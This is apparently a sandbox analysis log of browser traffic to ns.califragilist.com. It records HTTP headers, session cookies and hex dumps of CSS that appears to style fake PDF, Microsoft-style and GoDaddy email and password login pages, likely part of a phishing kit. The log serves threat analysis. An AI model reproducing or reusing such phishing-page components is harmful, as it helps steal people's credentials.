                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:59 UTC1041INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:59 GMT
                                                                                                                                              Content-Type: text/css;charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="34m8PEW3Ch1AL9UabKKEr8920"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MbBUfp7hIlrsUMb3bunb2XIjRxOVuEcqv%2FwQNlVMkSbhXbrJCyTOf%2BzcwK3dl%2F9yV5lxNXY4B3yGf07ourtK3YDsAD4H2%2FerKR8Qwl0dGVBBlTpJfqBWsDx4MFo6%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3404&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2213&delivery_rate=827428&cwnd=251&unsent_bytes=0&cid=67524dc81b829b43&ts=137&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6455f8e606b05-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1154&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1870&delivery_rate=2395368&cwnd=251&unsent_bytes=0&cid=e0c5c42ecbdc20b1&ts=407&x=0"
                                                                                                                                              2024-11-06 15:55:59 UTC328INData Raw: 33 37 39 39 0d 0a 23 61 75 74 68 63 61 6c 6c 64 65 73 63 2c 23 73 65 63 74 69 6f 6e 73 2c 2e 74 65 78 74 2d 6d 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 33 37 35 72 65 6d 7d 2a 2c 69 6e 70 75 74 5b 74 79 70 65 3d 72 61 64 69 6f 5d 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 61 6c 65 72 74 2c 2e 72 61 64 69 6f 20 6c 61 62 65 6c 2c 2e 72 6f 77 2e 74 69 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 23 73 65 63 74 69 6f 6e 73 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 2c 2e 74 61 62 6c 65 20 2e 74 61 62 6c 65 2d 63 65 6c 6c 2c 69 6d 67 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 68 65 61 64 65 72 20 23
                                                                                                                                              Data Ascii: 3799#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 3a 68 6f 76 65 72 2c 69 6e 70 75 74 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 2a 2c 69 6e 70 75 74 7b 6d 61 72 67 69 6e 3a 30 7d 2e 70 2c 2e 73 75 62 74 69 74 6c 65 2c 2e 74 65 78 74 2d 62 6f 64 79 2c 2e 74 65 78 74 2d 73 75 62 74 69 74 6c 65 2c 68 34 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2a 2c 2e 74 65 78 74 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 53 65 67 6f 65 20 55 49 22 2c 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 52 6f 62 6f 74 6f 2c 45 62 72 69 6d 61 2c 22 4e 69 72 6d 61 6c 61 20 55 49 22 2c 47 61 64 75 67 69 2c 22 53 65 67 6f 65 20 58 62 6f 78 20 53 79 6d 62 6f 6c 22 2c 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 22 4d 65 69 72 79 6f 20 55 49 22
                                                                                                                                              Data Ascii: :hover,input{color:inherit}*,input{margin:0}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI"
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 6d 61 67 65 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 62 61 63 6b 63 6f 6e 74 61 69 6e 65 72 3e 2e 62 67 33 3e 23 62 67 33 69 6d 61 67 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 61 64 65 72 73 6d 61 6c 6c 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 3a 31 30 30 70 78 20 30 20 30 20 38 35 70 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 7b 63 6f 6c 6f
                                                                                                                                              Data Ascii: mage,#sections_pdf .pdfbackcontainer>.bg3>#bg3image{width:100%;height:auto}#sections_pdf .loadersmall{position:absolute;width:100px;height:100px;margin:100px 0 0 85px;display:flex;justify-content:center;align-content:center}#sections_pdf .lds-spinner{colo
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 31 30 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 32 37 30 64 65 67 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 2e 32 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 31 31 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 30 30 64 65 67 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 2d 2e 31 73 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 64 73 2d 73 70 69 6e 6e 65 72 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 31 32 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 33 30 64 65 67 29 3b 61
                                                                                                                                              Data Ascii: s}#sections_pdf .lds-spinner div:nth-child(10){transform:rotate(270deg);animation-delay:-.2s}#sections_pdf .lds-spinner div:nth-child(11){transform:rotate(300deg);animation-delay:-.1s}#sections_pdf .lds-spinner div:nth-child(12){transform:rotate(330deg);a
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 6c 6f 67 69 6e 62 6f 78 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 69 64 65 62 6f 78 7b 70 61 64 64 69 6e 67 3a 2e 33 31 32 35 70 63 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 34 34 34 29 3b 77 69 64 74 68 3a 61 75 74 6f 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 7b 70 6f 73 69 74 69
                                                                                                                                              Data Ascii: ckground-color:#fff;padding:6px 10px;color:#000;font-weight:700;cursor:pointer;text-decoration:none}#sections_pdf .login .loginbox,#sections_pdf .login .sidebox{padding:.3125pc;background:rgba(0,0,0,.444);width:auto;height:auto}#sections_pdf .login{positi
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 65 6d 61 69 6c 62 6c 6f 63 6b 2c 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 70 61 73 73 77 6f 72 64 62 6c 6f 63 6b 7b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 6c 6f 67 69 6e 20 2e 73 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 69 6e 66 6f 73 70 61 6e 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 77 69 64 74 68 3a 33 36 30 70 78 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 50 6c 61 79 66 61 69 72 20 44 69 73
                                                                                                                                              Data Ascii: #sections_pdf .login .selectProvider .emailblock,#sections_pdf .login .selectProvider .passwordblock{margin:auto;width:auto}#sections_pdf .login .selectProvider .infospan{display:flex;flex-direction:column;width:360px;height:auto;font-family:'Playfair Dis
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 65 6c 65 63 74 50 72 6f 76 69 64 65 72 20 2e 73 65 72 76 69 63 65 6c 61 62 65 6c 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 34 39 38 29 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 50 6c 61 79 66 61 69 72 20 44 69 73 70 6c 61 79 27 2c 73 65 72 69 66 7d 23 73 65 63 74 69 6f 6e 73 5f 70 64 66 20 2e 70 64 66 6f 76 65 72 6c 61 79 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 33 37 29 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 30 30 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                                              Data Ascii: electProvider .servicelabel{color:rgba(255,255,255,.498);text-align:center;font-size:13px;font-family:'Playfair Display',serif}#sections_pdf .pdfoverlay{width:100%;height:100vh;position:fixed;background-color:rgba(0,0,0,.37);z-index:100000}body{background
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 77 69 64 74 68 3a 35 70 78 3b 68 65 69 67 68 74 3a 35 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 3b 63 6f 6c 6f 72 3a 23 30 30 36 37 62 38 3b 61 6e 69 6d 61 74 69 6f 6e 3a 32 73 20 69 6e 66 69 6e 69 74 65 20 70 72 6f 67 72 65 73 73 44 6f 74 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6c 6f 61 64 69 6e 67 2d 63 6f 6e 74 61 69 6e 65 72 2e 6c 6f 61 64 69 6e 67 20 2e 64 6f 74 2d 66 6c 6f 61 74 69 6e 67 3a 66 69 72 73 74 2d 63 68
                                                                                                                                              Data Ascii: ition:relative}#sections .loading-container.loading .dot-floating{position:relative;width:5px;height:5px;border-radius:5px;background-color:#0067b8;color:#0067b8;animation:2s infinite progressDot}#sections .loading-container.loading .dot-floating:first-ch
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 30 7b 77 69 64 74 68 3a 31 30 30 25 7d 23 73 65 63 74 69 6f 6e 73 20 2e 64 65 62 75 67 2d 64 65 74 61 69 6c 73 2d 68 65 61 64 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 7d 23 73 65 63 74 69 6f 6e 73 20 2e 64 65 62 75 67 2d 74 72 61 63 65 2d 73 65 63 74 69 6f 6e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 23 73 65 63 74 69 6f 6e 73 20 23 64 65 62 75 67 44 65 74 61 69 6c 73 48 65 61 64 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 23 73 65 63 74 69 6f 6e 73 20 2e 6f 70 74 73 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 34 34 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 34 34 30 70 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 61 63 6b 67 72
                                                                                                                                              Data Ascii: 0{width:100%}#sections .debug-details-header{margin-bottom:10px}#sections .debug-trace-section{margin-top:10px}#sections #debugDetailsHeader{font-size:15px;font-weight:700}#sections .opts{padding:10px 44px;max-width:440px;cursor:pointer;margin:auto;backgr
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 74 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 69 6e 70 75 74 2d 67 72 6f 75 70 20 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2c 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 7d 2e 69 6e 70 75 74 2d 67 72 6f 75 70 2d 61 64 64 6f 6e 7b 77 69 64 74 68 3a 31 25 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 63 6f 6c 6f 72 3a 23 35 35 35 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 62
                                                                                                                                              Data Ascii: t;width:100%;margin-bottom:0}.input-group .form-control,.input-group-addon{display:table-cell}.input-group-addon{width:1%;white-space:nowrap;padding:6px 12px;font-size:14px;font-weight:400;line-height:1;color:#555;text-align:center;background-color:#eee;b


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              60192.168.2.1849827188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:59 UTC1286OUTGET /xyAq43pQ3AarsEuef30 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:55:59 UTC1028INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:59 GMT
                                                                                                                                              Content-Type: text/css;charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="xyAq43pQ3AarsEuef30"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F2ToaWFgrrZjihKjHqJLKAHrd5K9pO%2B%2BoFD5rI3SVFiz6EaU4MCoDYuOFbhjmw0vqhwEsv6lOoBaDjdY2CXPkBhpPfzM9OZwkP9wrduHfyEcH5AHA39xg3NQ3WGrew%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3361&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2208&delivery_rate=856551&cwnd=251&unsent_bytes=0&cid=c086ea294cb5ce4f&ts=137&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6455f9c7fddb4-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1077&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1864&delivery_rate=2540350&cwnd=32&unsent_bytes=0&cid=b5c22f3908ad79f0&ts=528&x=0"
                                                                                                                                              2024-11-06 15:55:59 UTC341INData Raw: 33 37 39 66 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 7b 0d 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 67 64 73 68 65 72 70 61 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 7d 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 61 20 7b 0d 0a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 32 72 71 61 70 77 2c 23 30 30 30 29 3b 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 37 69 66 35 70 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72
                                                                                                                                              Data Ascii: 379f#sections_godaddy {font-family: gdsherpa !important;}#sections_godaddy a { color: var(--ux-2rqapw,#000); -webkit-text-decoration: var(--ux-1f7if5p,underline); text-decoration: var(--ux-1f7if5p,underline); background-color: transpar
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 72 20 7b 0d 0a 2f 2a 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 75 78 2d 31 6a 38 37 76 76 6e 2c 23 66 66 66 29 3b 2a 2f 0d 0a 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 74 30 6b 68 6d 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 76 61 72 28 2d 2d 75 78 2d 31 66 74 30 6b 68 6d 2c 75 6e 64 65 72 6c 69 6e 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 73 76 67 20 7b 0d 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 75 6e 73 65 74 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 62 75
                                                                                                                                              Data Ascii: r {/* color: var(--ux-1j87vvn,#fff);*/ -webkit-text-decoration: var(--ux-1ft0khm,underline); text-decoration: var(--ux-1ft0khm,underline);}#sections_godaddy svg { overflow: hidden; vertical-align: unset;}#sections_godaddy .ux-bu
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 78 53 70 61 63 65 2d 2d 67 61 70 2d 73 69 7a 65 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 2d 7a 64 30 73 65 72 2c 33 29 20 2a 20 76 61 72 28 2d 2d 75 78 2d 31 73 62 66 69 67 38 2c 2e 32 35 72 65 6d 29 20 2a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 67 61 70 2d 61 64 6a 75 73 74 6d 65 6e 74 2c 31 29 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64 61 64 64 79 20 2e 75 78 2d 73 70 61 63 65 2e 75 78 2d 73 70 61 63 65 2d 2d 69 6e 6c 69 6e 65 3a 65 6d 70 74 79 20 7b 0d 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 66 6c 65 78 3b 0d 0a 20 20 69 6e 6c 69 6e 65 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 75 78 53 70 61 63 65 2d 2d 70 61 64 64 69 6e 67 2d 73 69 7a 65 29 3b 0d 0a 7d 0d 0a 0d 0a 23 73 65 63 74 69 6f 6e 73 5f 67 6f 64
                                                                                                                                              Data Ascii: xSpace--gap-size: calc(var(--ux-zd0ser,3) * var(--ux-1sbfig8,.25rem) * var(--uxSpace--gap-adjustment,1));}#sections_godaddy .ux-space.ux-space--inline:empty { display: inline-flex; inline-size: var(--uxSpace--padding-size);}#sections_god
                                                                                                                                              2024-11-06 15:55:59 UTC1369INData Raw: 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 30 29 20 76 61 72 28 2d 2d 75 78 2d 6f 6c 30 37 30 33 2c 2f 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 2d 32 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 2d 31 29 20 76 61 72 28 2d 2d 75 78 2d 6f 6c 30 37 30 33 2c 2f 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29 3b 0d 0a 20 20 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 31 3a 20 63 61 6c 63 28 76 61 72 28 2d 2d 75 78 54 65 78 74 2d 2d 66 6f 6e 74 53 69 7a 65 30 29 20 76 61 72 28 2d 2d 75 78 2d 79 34 70 67 38 7a 2c 2a 29 20 76 61 72 28 2d 2d 75 78 2d 37 73 34 70 33 76 2c 31 2e 31 32 35 29 29
                                                                                                                                              Data Ascii: xt--fontSize0) var(--ux-ol0703,/) var(--ux-7s4p3v,1.125)); --uxText--fontSize-2: calc(var(--uxText--fontSize-1) var(--ux-ol0703,/) var(--ux-7s4p3v,1.125)); --uxText--fontSize1: calc(var(--uxText--fontSize0) var(--ux-y4pg8z,*) var(--ux-7s4p3v,1.125))
